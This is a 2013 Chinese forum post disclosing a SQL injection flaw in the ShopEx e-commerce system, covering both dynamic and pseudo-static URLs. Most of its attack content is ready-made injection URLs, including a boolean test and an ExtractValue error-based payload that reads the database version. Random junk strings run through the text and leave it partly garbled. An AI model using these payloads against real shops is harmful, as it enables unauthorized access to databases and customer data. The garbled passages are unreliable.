注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
7 q- r7 ]8 ^& d U3 u
2 r9 l" k" q/ Z& a. C好吧,我扯远了~~; Z- u4 d' A4 g6 [; X
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
7 C! D+ M; y; v" U9 t不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
: H# q' d- H% r0 ^5 a8 e( `6 p
; {% ^$ U; a, s2 O: lhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html" g- }! T( P9 a/ K: u
4 k8 P* i% }. S9 N$ [* }
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html! I( A* a s W
0 s; v; w7 b9 i2 b. {8 i
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html$ M) c; s( C; J- d# C9 A* t) F
8 ?+ r$ y! v: o# ehttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
$ D9 G9 y% \0 E7 g3 g
: k$ H$ }; Q) D4 _
* f2 f% A1 Z0 U/ E- Z4 g8 X/ ~一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。/ k9 F/ O' b; K8 o5 L9 Z- Z
如何注入就不多说了,10多年的东西了…不会也会了…
4 h! I/ W4 O4 X3 t& u2 n$ I) K! g1 b- J! i- u1 i5 W
|
发表于 2013-2-4 16:20:04
收藏
支持
反对